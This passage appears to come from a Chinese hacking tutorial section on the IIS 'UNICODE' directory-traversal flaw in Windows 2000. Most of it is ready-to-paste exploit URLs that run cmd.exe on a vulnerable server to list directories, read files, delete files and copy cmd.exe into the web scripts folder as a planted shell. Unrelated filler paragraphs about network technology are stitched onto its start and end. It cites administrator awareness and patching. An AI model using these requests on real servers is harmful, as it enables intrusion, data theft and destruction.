網(wǎng)絡(luò)技術(shù)是從1990年代中期發(fā)展起來的新技術(shù)，它把互聯(lián)網(wǎng)上分散的資源融為有機(jī)整體，實(shí)現(xiàn)資源的全面共享和有機(jī)協(xié)作，使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計(jì)算機(jī)、存儲(chǔ)資源、數(shù)據(jù)資源、信息資源、知識(shí)資源、專家資源、大型數(shù)據(jù)庫、網(wǎng)絡(luò)、傳感器等。 當(dāng)前的互聯(lián)網(wǎng)只限于信息共享，網(wǎng)絡(luò)則被認(rèn)為是互聯(lián)網(wǎng)發(fā)展的第三階段。

6.9 UNICODE漏洞入侵(1)

    

6.9  UNICODE漏洞入侵

風(fēng)光了很久的UNICODE漏洞是經(jīng)常被入侵者利用的漏洞之一。在2001年5月1日大戰(zhàn)中，黑客們就普遍利用此漏洞對各國網(wǎng)站進(jìn)行攻擊，究其原因：一是由于此漏洞剛公布不久，二是網(wǎng)絡(luò)安全管理員安全意識(shí)低下，對UNICODE漏洞不進(jìn)行及時(shí)的修補(bǔ)，使入侵者通過UNICODE漏洞入侵網(wǎng)站得逞。

但是現(xiàn)在網(wǎng)上還有很多服務(wù)器還存在著UNICODE漏洞，此漏洞可以使一般稍懂計(jì)算機(jī)的人直接通過瀏覽器，向存有漏洞的服務(wù)器發(fā)送請求，就可以入侵存有UNICODE漏洞的服務(wù)器。

接下來將全面講述入侵者是如何利用此漏洞對網(wǎng)站進(jìn)行入侵，也希望可以引起管理員們的安全意識(shí)，盡快對UNICODE漏洞進(jìn)行修補(bǔ)(修補(bǔ)方法請讀閱3.7.1 節(jié)中UNICODE漏洞的修補(bǔ))

6.9.1  用于UNICODE漏洞入侵的命令

下面以中文版Windows 2000為例，對于其他版本只需更改其編碼即可，參閱3.7.1 節(jié)中UNICODE漏洞的修補(bǔ)。

首先將介紹入侵者在入侵存在UNICODE漏洞的服務(wù)器時(shí)所涉及到的有關(guān)命令，其實(shí)有些命令和在DOS下使用的命令是一樣的，但如CD這一類命令則不可用。

1. dir命令

列出目標(biāo)計(jì)算機(jī)的目錄。在瀏覽器的地址欄中輸入如下內(nèi)容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\

或者

http://127.0.0.1/scripts /..%c0%2f../ winnt/system32/cmd.exe?/c+dir+d:\等

以上內(nèi)容是使用dir命令，讓存在UNICODE漏洞的服務(wù)器列出d盤的目錄，如圖6-65所示。

圖6-65  使用dir命令，列出d盤的目錄

2. 顯示下一個(gè)目錄

這里不使用CD命令 ，而是直接輸入路徑。如果進(jìn)入d盤下的Inetpub文件，可在瀏覽器的地址欄中輸入如下內(nèi)容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\Inetpub

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+d:\Inetpub

如圖6-66所示。

圖6-66  進(jìn)入d盤下的Inetpub文件

3. type命令

顯示文件內(nèi)容 。可以在瀏覽器中顯示txt 、htm、 asp等格式的內(nèi)容，如要顯示d盤下config.txt文件的內(nèi)容，可在瀏覽器的地址欄中輸入如下內(nèi)容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type +d:\config.txt 

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type +d:\config.txt等

如圖6-67所示。

圖6-67  使用type命令顯示config.txt的內(nèi)容

4. del命令

刪除文件命令。例如，要?jiǎng)h除d盤下的config.txt文件，可在瀏覽器的地址欄中輸入如下內(nèi)容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del +d:\config.txt 

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del +d:\config.txt  等

如圖6-68所示。

圖6-68  使用del命令刪除d盤下config.txt文件

5. copy命令

復(fù)制指定文件或同時(shí)將該文件改名，例如將d盤Winnt\system32下的cmd.exe程序復(fù)制到d盤Inetpub\scripts下，并改名為win.exe，可在瀏覽器的地址欄中輸入如下內(nèi)容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+d:\winnt\system32\cm d.exe d:\inetpub\scripts\win.exe

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+d:\winnt\system32\cm   d.exe d:\inetpub\scripts\win.exe

如圖6-69和6-70所示。

圖6-69  改名為win.exe的cmd.exe程序

圖6-70  復(fù)制cmd.exe程序

從圖6-69中可以看到，d盤Winnt\system32下的cmd.exe程序成功地復(fù)制到d盤Inetpub\scripts下并改名為win.exe 。

網(wǎng)絡(luò)的神奇作用吸引著越來越多的用戶加入其中，正因如此，網(wǎng)絡(luò)的承受能力也面臨著越來越嚴(yán)峻的考驗(yàn)―從硬件上、軟件上、所用標(biāo)準(zhǔn)上......，各項(xiàng)技術(shù)都需要適時(shí)應(yīng)勢，對應(yīng)發(fā)展，這正是網(wǎng)絡(luò)迅速走向進(jìn)步的催化劑。